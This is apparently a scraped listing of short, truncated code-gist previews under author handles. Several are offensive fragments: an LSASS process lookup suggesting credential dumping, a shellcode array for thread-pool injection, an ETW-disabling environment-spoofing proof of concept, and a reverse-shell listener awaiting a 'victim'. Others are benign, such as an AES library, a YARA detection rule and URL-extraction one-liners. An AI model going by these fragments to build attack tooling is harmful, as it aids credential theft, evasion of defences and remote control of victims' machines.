N4kedTurtle

#define _CRT_SECURE_NO_WARNINGS
#include <Windows.h>
#include <Psapi.h>
#include <TlHelp32.h>
#include <iostream>

DWORD GetLsassPid() {

	PROCESSENTRY32 entry;
	entry.dwSize = sizeof(PROCESSENTRY32);

hypoxic

/*****************************************************************************
 * aes-min.c
 *
 * Minimal byte-oriented AES-128 encryption/decryption implementation suitable
 * for small microprocessors.
 ****************************************************************************/

/*****************************************************************************
 * Includes
 ****************************************************************************/

ropnop

package main

/*
Example Go program with multiple .NET Binaries embedded

This requires packr (https://github.com/gobuffalo/packr) and the utility. Install with:
	$ go get -u github.com/gobuffalo/packr/packr

Place all your EXEs are in a "binaries" folder

alfarom256

#include <windows.h>
#include <stdio.h>
#include <threadpoolapiset.h>

#define LEN 277

// run calc
unsigned char op[] =
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"

xpn

// A very rough x64 POC for spoofing environment variables similar to argument spoofing with a focus on
// setting the COMPlus_ETWEnabled=0 var for disabling ETW in .NET.
//
// Works by launching the target process suspended, reading PEB, updates the ptr used to store environment variables,
// and then resuming the process.
//
// (https://blog.xpnsec.com/hiding-your-dotnet-complus-etwenabled/)

#define INJECT_PARAM L"COMPlus_ETWEnabled=0\0\0\0"
#define INJECT_PARAM_LEN 43

gwen001

curl -L -k -s https://www.example.com | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | awk -F '//' '{if(length($2))print "https://"$2}' | sort -fu | xargs -I '%' sh -c "curl -k -s \"%\" | sed \"s/[;}\)>]/\n/g\" | grep -Po \"(['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})|(\.(get|post|ajax|load)\s*\(\s*['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})\"" | awk -F "['\"]" '{print $2}' | sort -fu

# using linkfinder
function ejs() {
   URL=$1;
   curl -Lks $URL | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | sed -r "s/^src['\"]?[=:]['\"]//g" | awk -v url=$URL '{if(length($1)) if($1 ~/^http/) print $1; else if($1 ~/^\/\//) print "https:"$1; else print url"/"$1}' | sort -fu | xargs -I '%' sh -c "echo \"\n##### %\";wget --no-check-certificate --quiet \"%\"; basename \"%\" | xargs -I \"#\" sh -c 'linkfinder.py -o cli -i #'"
}

# with file download (the new best one):
# but there is a bug if you don't provide a root url

ykoster

#!/usr/bin/env python3
import json
import random
import urllib3
import requests
import urllib.parse

base_url='https://127.0.0.1/'
username='admin'
password='initial'

JohnLaTwC

rule gen_ModernExcel4Macro
{
    meta:
        description = "Detects Modern Excel4 macro use"
        author = "John Lambert @JohnLaTwC"
        date = "2020-04-15"
        hash1 = "308c0fee671459705221c5f1a8cee944f5ea803fddd0faa620cc8266d48c662b"
        hash2 = "618fee2c2f89a4f15b680e1ca9393d25c857e6d107fa0eb45b1a21c7601f975e"
        reference1 = "https://twitter.com/DissectMalware/status/1250411834953420808"
    strings:

alonstern

def _split_to_blocks(self, data, tags, block_size, padding_size):
    data_blocks = []
    tags_blocks = []
    for file_data, file_tags in zip(data, tags):
        for start_index in range(0, len(file_data), block_size):
            data_blocks.append(self._get_padded_data(file_data, start_index, block_size, padding_size))
            tags_blocks.append(file_tags[start_index: start_index + block_size])

    return data_blocks, tags_blocks

tommasodeponti

import socket


my_ip = '192.168.43.82'
port = 4444
server = socket.socket()
server.bind((my_ip, port))
print('[+] Server Started')
print('[+] Listening For Victim')
server.listen(1)